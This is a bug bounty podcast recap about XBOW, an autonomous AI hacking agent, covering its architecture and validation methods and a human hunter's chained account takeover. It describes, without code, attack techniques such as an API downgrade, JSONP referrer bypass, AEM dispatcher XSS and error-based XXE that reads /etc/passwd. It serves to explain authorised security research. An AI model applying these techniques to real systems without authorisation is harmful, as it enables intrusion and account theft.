- Critical Thinking - Bug Bounty Podcast
- Posts
- [HackerNotes Ep. 134] XBOW - AI Hacking Agent and Human in the Loop with Diego Jurado
[HackerNotes Ep. 134] XBOW - AI Hacking Agent and Human in the Loop with Diego Jurado
In this episode we’re joined by Diego Jurado to give us the scoop on XBOW. We cover a little about its architecture and approach to hunting, the challenges with hallucinations, and the future of AI in the BB landscape. Diego also shares some of his own hacking journey and successes in the Ambassador World cup.
Hacker TL;DR
API Chain Exploitation: Diego chained multiple vulnerabilities to achieve account takeover through API downgrade (v5→v2), method modification (POST→GET), JSONP callback parameter injection, and exploitation of AEM dispatcher bypass to inject XSS on a whitelisted domain that bypassed referrer-based access controls. Great chain!
Advanced XXE Techniques: Exploitation of XXE in Akamai CloudTest's SOAP endpoint required a sophisticated approach after direct XXE failed, hosting external malicious DTD files, crafting error-based payloads that force specific error conditions, and targeting /etc/passwd with external entity references.
AI-Driven JS Analysis: XBOW autonomously identifies empty JavaScript variables as potential XSS vectors by reasoning they may be populated from query parameters. This wasn't explicitly prompted but emerged from the AI's independent analysis.
XBOW Using Headless Browsers: Advanced DOM vulnerability detection using Chrome DevTools Protocol enables monitoring DOM modifications, JavaScript event listeners (particularly postMessage handlers), console activities, and HTTP requests without traditional debugging. This allows automated systems like XBOW to identify complex client-side vulnerabilities like DOM-XSS and postMessage attacks that typically require manual testing.

Tired of endless application approval requests slowing down your team?
The ThreatLocker User Store automates access to safe, pre-vetted software. Eliminate shadow IT and slash helpdesk tickets while strengthening your Zero Trust framework.
Bring a BUG! - Account Takeover with Multi-Step Chained Attack
To kick off, Diego showed us an account takeover that required chaining multiple vulns. The target was a company with an identity management system that had an endpoint to validate user tokens and retrieve access scope information.
The first step exploited an API downgrade vulnerability. The original endpoint was /api/v5/token
, which required a client ID in the POST body. By downgrading from v5 to v2, Diego and his teammate were able to modify the request from POST to GET while maintaining functionality, opening the door for the next attacks.
Next, they discovered JSONP support on the endpoint. When adding a callback parameter to the request, the response would be wrapped in a JSONP structure, enabling cross-domain access to the response data. However, not all origins were allowed to make these requests, as the server implemented referrer-based access control. Only requests coming from specific whitelisted domains would receive valid data.
This presented a challenge: they needed to find an XSS or similar vulnerability on one of the whitelisted domains. After examining the whitelisted domains, they discovered one was running Adobe Experience Manager (AEM). Diego identified a dispatcher bypass vulnerability that allowed them to exploit an XSS on the whitelisted domain. With this XSS, they were able to make a request to the vulnerable endpoint with the proper referrer, completing the chain that led to account takeover.
This part of the pod was mainly Diego describing how XBOW works and “thinks”, for a full walkthrough of the bug, check the link in the title of this section.
XBOW was initially given a URL from a HackerOne program and tasked with finding file read vulnerabilities. During its exploration, it discovered a SOAP endpoint at /repository/service
. The AI recognised this as a potential target for XML External Entity attacks based on response characteristics that suggested XML processing.
After identifying the target, XBOW began testing various XXE payloads. It first attempted direct XXE exploitation, which failed, leading it to try inbound, outbound, and error-based payloads. It then located additional documentation in a WSDL file that provided more information about the service.
An interesting part was hearing about how it handled out-of-band exploitation. It crafted and hosted a malicious DTD file on its attack machine, then created an error-based XXE payload that would reference this DTD. The payload was designed to point to a non-existent file to force an error condition, while simultaneously attempting to read the /etc/passwd
file. When executed, this technique successfully retrieved the content of the system file, confirming the vulnerability.
An interesting aspect of this case study was that the AI's reasoning trace contained some hallucinations. For instance, it referenced a non-existent CVE and incorrectly described the evolution of the product. Even when the intermediate reasoning steps contain inaccuracies, the AI can still reach correct conclusions through validation steps to confirm the vulnerability is real before reporting.
XBOW AI Architecture and Capabilities
XBOW is an autonomous AI-based bug bounty system that has discovered over 1100 vulnerabilities without human intervention. Diego provided insights into how this AI system functions and its architecture.
At a high level, XBOW employs a "coordinator" that oversees the bug hunting process. The coordinator performs initial discovery, identifies endpoints, and then spawns multiple "solvers", effectively individual AI pentesters with specific objectives. For example, one solver might be tasked with finding XSS vulnerabilities on a particular endpoint, while another might search for SQLi on a different part of the application.
Each solver operates independently with its own isolated "attack machine", an environment that includes various tools for vulnerability discovery and exploitation. These attack machines are isolated from XBOW's infrastructure to prevent security risks if a target attempts to counter-hack the system.
One particularly interesting aspect of XBOW's architecture is its harness system, which includes:
Headless browsers for client-side testing and verification
Exfiltration servers using InteractSH for out-of-band callbacks
Payload hosting services for exploits requiring external resources
Network monitoring and proxying to enforce scope boundaries
The system can generate and execute Python scripts to test multiple payloads efficiently within a single iteration. This allows it to try various attack variations without consuming excessive computational resources. XBOW implements safeguards to prevent testing out-of-scope assets by checking program policies and implementing proxy rules that block traffic to unauthorised domains.
A significant advancement in XBOW's capabilities is its ability to handle authentication and maintain state across requests. The system passes context from the coordinator to solvers, ensuring they have all the necessary information about authentication sessions and navigation paths to reach specific endpoints. To identify itself during testing, XBOW sends a custom X-Bow header with each request. This header changes regularly to prevent impersonation and helps companies identify when XBOW is testing their systems.
JavaScript Analysis and DOM Testing
Diego shared insights into XBOW's sophisticated approach to finding client-side vulnerabilities. One particularly impressive capability is how it analyses JavaScript code to identify potential injection points.
In the example of the Global Protect XSS vulnerability, XBOW examined the JavaScript response and identified empty JavaScript variables that might be controllable through user input. The AI reasoned that these empty variables could potentially be populated with data from query parameters, making them prime targets for XSS testing. This demonstrates a level of code analysis and intuition that goes beyond simple pattern matching or payload testing.
For DOM-based vulnerabilities, including postMessage attacks, XBOW uses headless browsers via Chrome DevTools Protocol. This allows it to:
Examine the DOM structure and modifications
Monitor JavaScript event listeners, including postMessage handlers
Track console logs and errors
Host HTML POCs to demonstrate exploitability
The system doesn't currently have direct access to browser breakpoints or step-through debugging, but it can observe DOM and console changes to infer how the application processes data. This has enabled XBOW to discover postMessage vulnerabilities by identifying message listeners and crafting exploits that trigger them.
To verify XSS vulnerabilities, XBOW runs the payload in a headless browser and confirms that the expected action (like an alert) actually executes. This validation step eliminates false positives for client-side issues and ensures that only real, exploitable vulnerabilities are reported.
False Positive Reduction and Validation
One of the most significant challenges for automated security testing is false positives. Diego emphasised that XBOW prioritises accuracy over quantity, implementing various validation mechanisms to ensure reported vulnerabilities are legitimate.
For XSS vulnerabilities, XBOW uses headless browsers to execute the discovered payloads and verify that they trigger the expected behaviour, such as displaying an alert dialogue. This approach has effectively eliminated false positives for XSS detection.
SSRF validation was more challenging. Initially, XBOW struggled with false positives when the AI attempted to use external services to trigger callbacks to its InteractSH server. The team addressed this by implementing stricter proxy rules and DNS configurations to prevent direct external requests, ensuring that any callbacks received truly indicate server-side request processing.
For open redirect vulnerabilities, validation is relatively straightforward as the system can directly observe whether a redirect occurs as expected. But some vulnerability types, like information disclosure, remain difficult to validate because checking if the exposed information is sensitive requires human judgment.
If you want to know more, XBOW will be presenting details about their validation system at Black Hat this year!
Bug Bounty Performance
XBOW quickly reached #1 on HackerOne's leaderboard in just three months. Diego responded to critics claiming XBOW only finds XSS vulnerabilities, particularly regarding repeated Global Protect XSS reports.
While XSS is a large portion of their findings, there’s a lot more in XBOW's vuln portfolio:
15 Remote Code Execution (RCE) vulnerabilities in three months
32 SQL Injection vulnerabilities in 90 days
XXE vulnerabilities like the Cloud Test example
Various other high-severity issues
Being at the top of the leaderboard inevitably means finding and reporting many of the same types of vulnerabilities, as these are the most commonly occurring issues across programs. Even top human hunters don't reach leaderboard positions by reporting only RCEs, which are relatively rare.
Regarding the Global Protect findings, while they did find a specific XSS vulnerability that affected many implementations, they also reported it responsibly to Palo Alto Networks first. Many of these reports were marked as informative or N/A on HackerOne since companies often don't accept reports for CVEs, meaning XBOW's reputation points didn't primarily come from these findings.
XBOW uses bug bounty programs mainly as a "playground" to improve the product, test new capabilities, and validate its approach across diverse applications and environments. They focus exclusively on HackerOne rather than other platforms because it provides sufficient diversity for their testing needs.
Prompting and AI Training Approach
Here are some insights on how the XBOW prompts are structured, for vulnerability types that the AI might not thoroughly test by default, such as postMessage vulnerabilities or serialisation-based XSS, the team develops technical prompts that guide the AI to try specific techniques:
Providing as many details as possible about the attack techniques to test improves performance
Generic descriptions tend to result in the AI testing only typical payloads while missing more complex techniques
Specifying endpoints and vulnerability types narrows the focus and improves efficiency
Python generation is favoured as it allows testing multiple payloads in a single iteration
Some models perform better with Python than with other tools like cURL, influencing their approach to code generation.
The AI team at XBOW works with the security researchers to refine prompts, with researchers providing technical details about attack techniques while the AI specialists optimise the prompt structure for better performance.
Interestingly, XBOW had an affinity for identifying empty JS variables as potential injection points; this idea was not explicitly prompted so it apparently came from the model's own analysis. This suggests that the underlying models have internalised certain security testing approaches that weren't explicitly taught through prompting.
The Future of AI in Bug Hunting
Complex vulnerability chains like the multi-step account takeover remain challenging for AI systems. That said, XBOW is already chaining some vulnerabilities together, like using SSRF to achieve local file inclusion.
Right now, XBOW isn't making any money; inference costs exceed bounty earnings. But with operation costs expected to drop over the next year, autonomous bug hunting will eventually become economically viable. This opens the door to AI systems becoming standard security tools.
Diego believes fully autonomous systems will dominate rather than human-in-the-loop approaches. While human intuition and creativity certainly add value, autonomy simply scales better. He thinks there are ways to incorporate human expertise without requiring constant human involvement.
XBOW and tools like it are gonna shake things up for security researchers. Some people will struggle to adapt as AI takes over the easy stuff but there'll still be plenty of work for humans who know their shit.
The researchers who'll make bank in the future are the ones who can do what the machines can't, like chain together complex exploits, spot weird business logic issues, and understand the bigger picture of how systems actually work in practice. AI might be good at finding XSS, but it's not about to understand why a particular workflow in a financial app could lead to fraud.
That’s it for the week,
and as always, keep hacking!